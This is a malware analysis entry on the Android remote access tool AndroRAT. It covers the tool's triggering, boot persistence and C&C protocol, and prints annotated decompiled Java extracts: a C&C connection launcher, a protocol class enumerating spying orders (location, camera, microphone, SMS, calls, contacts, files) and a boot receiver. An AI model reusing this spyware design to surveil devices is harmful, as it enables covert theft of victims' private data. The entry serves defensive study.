AndroRAT

2016-01-07

Summary

Android remote access tool

GroDDViewer graphs:

Details

AndroRAT is malware discovered in 2016. This malware is a remote administration tool. It is not hidden inside a benign application, and its communication does not go through Tor. We can suppose this malware is currently under development.

Stage 1: Malicious code execution

At launch, you have to enter the IP address and the port of the command-and-control (C&C) server. Once this information is filled in, press the Start Service button; at this moment the application tries to connect to the C&C server and waits for an order.

Stage 2: Persistence

At reboot of the device, the application waits for the BOOT_COMPLETED intent; when it is received, it launches the Client class.

Stage 3: Communication

The communication with the C&C server does not go through Tor; instead the developer created his own communication system: all the data needed is sent as an array of bits, which is cut up to extract the information needed by each order, and the same is done for sending the result.

Other resources

Triggering

To trigger the malware, launch the application and set the IP address and the port of the C&C server.

Characteristics

Malware type :

  • Remote Administration Tool (RAT)
  • Spyware

Attacks :

  •   Confidentiality

  •   Integrity

  •   Availability

  •   Normal use

Infection technique :

Malicious code type :

  • Use remote code

Hiding techniques :

  • Obfuscation with variable renaming

Triggering techniques :

  • Waits for a message from a remote server
  • Waits for a particular user input

Samples

Java source code extracts:

LauncherActivity.java is the component started when the application is launched; you have to enter the IP address and the port of the C&C server. Order.java defines all the orders that can be launched by AndroRAT. BootReceiver.java is the component launched on reboot of the device.

LauncherActivity.java

 // Start-button handler from the decompiled LauncherActivity: packs the
 // operator-entered C&C address into the pending Client service intent and
 // starts that service. The fields it touches (Client, ipfield, portfield,
 // btnStart, btnStop) belong to the enclosing activity, which is not shown here.
 this.btnStart.setOnClickListener(new View.OnClickListener()
    {
      public void onClick(View paramAnonymousView)
      {
        // The extra *keys* are the literal strings "192.168.28.128" and "2136"
        // (a private-range address and a port) — presumably a default-value
        // constant reused as the key name, or inlined by the compiler; the
        // Client service must read the same keys. Nothing validates the
        // address text before it is handed over.
        LauncherActivity.this.Client.putExtra("192.168.28.128", LauncherActivity.this.ipfield.getText().toString());
        // new Integer(String) throws NumberFormatException for non-numeric
        // input, so a malformed port value crashes this click handler.
        LauncherActivity.this.Client.putExtra("2136", new Integer(LauncherActivity.this.portfield.getText().toString()));
        // Hand-off to the Client component — the same one BootReceiver
        // restarts after a reboot (see the BootReceiver extract on this page).
        LauncherActivity.this.startService(LauncherActivity.this.Client);
        // UI toggles only; no connection result is reported back here.
        LauncherActivity.this.btnStart.setEnabled(false);
        LauncherActivity.this.btnStop.setEnabled(true);
      }
    });

Order.java

/**
 * Wire-protocol constants of the decompiled sample (listed on this page under
 * the heading Order.java; the decompiled class itself is named Protocol).
 *
 * Two numbering bases are used: P_INST (100) for instructions the C&C server
 * sends to the device, and P_REP (200, assigned in the static initializer)
 * for the replies/data the device sends back. The small literal values
 * (0-5, 20, 21) are session-level control codes.
 *
 * Initialization-order caveat: in this listing ACK_GIVE_CALL, ACK_SEND_SMS and
 * DATA_CALL_LOGS are computed from P_REP at their declaration, which executes
 * BEFORE the static block assigns P_REP = 200, so they evaluate to 13, 14 and
 * 15 rather than 213-215. Decompilers commonly reorder fields, so the original
 * source may have declared them differently — confirm against the bytecode
 * before relying on these values in a detection signature.
 */
public class Protocol
{
  // Reply codes computed at declaration time (see class comment: P_REP is
  // still 0 here, so these are 13 and 14 in this listing).
  public static final short ACK_GIVE_CALL = (short)(P_REP + 13);
  public static final short ACK_SEND_SMS = (short)(P_REP + 14);
  public static final short ACK_TOAST;
  // Packet-level status codes (by name; exact framing is not shown here).
  public static final int ALL_DONE = 3;
  // Argument values, presumably selecting the audio source of a stream order.
  public static final int ARG_STREAM_AUDIO_DOWN_CALL = 3;
  public static final int ARG_STREAM_AUDIO_MIC = 1;
  public static final int ARG_STREAM_AUDIO_UPDOWN_CALL = 4;
  public static final int ARG_STREAM_AUDIO_UP_CALL = 2;
  // Session control codes.
  public static final short CONNECT = 2;
  public static final short DATA_BASIC_INFO;
  // Computed at declaration time: 15 in this listing, not 215 (see class comment).
  public static final short DATA_CALL_LOGS = (short)(P_REP + 15);
  public static final short DATA_CONTACTS;
  public static final short DATA_FILE;
  public static final short DATA_GPS;
  public static final short DATA_GPS_STREAM;
  public static final short DATA_LIST_DIR;
  public static final short DATA_MONITOR_CALL;
  public static final short DATA_MONITOR_SMS;
  public static final short DATA_PICTURE;
  public static final short DATA_SMS;
  public static final short DATA_SOUND_STREAM;
  public static final short DATA_VIDEO_STREAM;
  public static final short DEBUG = 0;
  public static final short DISCONNECT = 5;
  public static final short DO_TOAST;
  public static final short DO_VIBRATE;
  // "envoi" is French for "send" — the developer's naming, kept as-is.
  public static final short ENVOI_CMD = 3;
  public static final short ERROR = 1;
  public static final short GET_ADV_INFORMATIONS;
  public static final short GET_BASIC_INFO;
  public static final short GET_CALL_LOGS;
  public static final short GET_CONTACTS;
  public static final short GET_FILE;
  public static final short GET_GPS;
  public static final short GET_GPS_STREAM;
  public static final short GET_PICTURE;
  public static final short GET_PREFERENCE = 21;
  public static final short GET_SMS;
  public static final short GET_SOUND_STREAM;
  public static final short GET_VIDEO_STREAM;
  public static final short GIVE_CALL;
  // Framing parameters of the custom transport described on this page.
  public static final int HEADER_LENGTH_DATA = 15;
  public static final short INFOS = 4;
  // Map keys used when an order carries an SMS number and body.
  public static final String KEY_SEND_SMS_BODY = "body";
  public static final String KEY_SEND_SMS_NUMBER = "number";
  public static final short LIST_DIR;
  public static final int MAX_PACKET_SIZE = 2048;
  public static final short MONITOR_CALL;
  public static final short MONITOR_SMS;
  public static final int NO_MORE = 1;
  public static final short OPEN_BROWSER;
  public static final int PACKET_DONE = 4;
  public static final int PACKET_LOST = 0;
  // Numbering bases. Non-final: P_REP is overwritten to 200 in the static
  // block below, after the three fields above have already used it.
  private static short P_INST = 100;
  private static short P_REP = 0;
  public static final short SEND_SMS;
  public static final short SET_PREFERENCE = 20;
  public static final int SIZE_ERROR = 2;
  public static final short STOP_GPS_STREAM;
  public static final short STOP_MONITOR_CALL;
  public static final short STOP_MONITOR_SMS;
  public static final short STOP_SOUND_STREAM;
  public static final short STOP_VIDEO_STREAM;
  
  // Instruction codes (server -> device) occupy 100..123; reply/data codes
  // (device -> server) occupy 200..212. This enumerates the sample's
  // capabilities and is the most useful part of the file for triage.
  static
  {
    GET_GPS = (short)(P_INST + 0);
    GET_GPS_STREAM = (short)(P_INST + 1);
    STOP_GPS_STREAM = (short)(P_INST + 2);
    GET_PICTURE = (short)(P_INST + 3);
    GET_SOUND_STREAM = (short)(P_INST + 4);
    STOP_SOUND_STREAM = (short)(P_INST + 5);
    GET_VIDEO_STREAM = (short)(P_INST + 6);
    STOP_VIDEO_STREAM = (short)(P_INST + 7);
    GET_BASIC_INFO = (short)(P_INST + 8);
    DO_TOAST = (short)(P_INST + 9);
    MONITOR_SMS = (short)(P_INST + 10);
    MONITOR_CALL = (short)(P_INST + 11);
    GET_CONTACTS = (short)(P_INST + 12);
    GET_SMS = (short)(P_INST + 13);
    LIST_DIR = (short)(P_INST + 14);
    GET_FILE = (short)(P_INST + 15);
    GIVE_CALL = (short)(P_INST + 16);
    SEND_SMS = (short)(P_INST + 17);
    GET_CALL_LOGS = (short)(P_INST + 18);
    STOP_MONITOR_SMS = (short)(P_INST + 19);
    STOP_MONITOR_CALL = (short)(P_INST + 20);
    GET_ADV_INFORMATIONS = (short)(P_INST + 21);
    OPEN_BROWSER = (short)(P_INST + 22);
    DO_VIBRATE = (short)(P_INST + 23);
    // Only from this point on does P_REP hold 200.
    P_REP = 200;
    DATA_GPS = (short)(P_REP + 0);
    DATA_GPS_STREAM = (short)(P_REP + 1);
    DATA_PICTURE = (short)(P_REP + 2);
    DATA_SOUND_STREAM = (short)(P_REP + 3);
    DATA_VIDEO_STREAM = (short)(P_REP + 4);
    DATA_BASIC_INFO = (short)(P_REP + 5);
    ACK_TOAST = (short)(P_REP + 6);
    DATA_MONITOR_SMS = (short)(P_REP + 7);
    DATA_MONITOR_CALL = (short)(P_REP + 8);
    DATA_CONTACTS = (short)(P_REP + 9);
    DATA_SMS = (short)(P_REP + 10);
    DATA_LIST_DIR = (short)(P_REP + 11);
    DATA_FILE = (short)(P_REP + 12);
  }
}

BootReceiver.java

/**
 * Persistence hook of the decompiled sample: a BroadcastReceiver that restarts
 * the Client service once the device has finished booting. For this to fire,
 * the manifest must register the receiver for BOOT_COMPLETED (and typically
 * request the RECEIVE_BOOT_COMPLETED permission); the manifest is not shown
 * here, but that registration is the static indicator a defender can look for.
 */
public class BootReceiver
  extends BroadcastReceiver
{
  // Log tag; the simple class name, "BootReceiver".
  public final String TAG = BootReceiver.class.getSimpleName();
  
  /**
   * Handles the incoming broadcast.
   *
   * @param paramContext context used to start the Client service
   * @param paramIntent  the broadcast; reassigned below to the service intent
   */
  public void onReceive(Context paramContext, Intent paramIntent)
  {
    // Logged before the action is checked, so any broadcast delivered to this
    // receiver produces this line, not only BOOT_COMPLETED.
    Log.i(this.TAG, "BOOT Complete received by Client !");
    // getAction() can return null for an intent carrying no action; with this
    // call order that would throw NullPointerException instead of being ignored.
    if (paramIntent.getAction().equals("android.intent.action.BOOT_COMPLETED"))
    {
      // The parameter is reused as a fresh explicit intent targeting Client.
      paramIntent = new Intent(paramContext, Client.class);
      // Action is set to "BootReceiver", presumably so Client can distinguish a
      // boot-triggered start from the one issued by LauncherActivity — verify
      // in Client.
      paramIntent.setAction(BootReceiver.class.getSimpleName());
      paramContext.startService(paramIntent);
    }
  }
}

Samples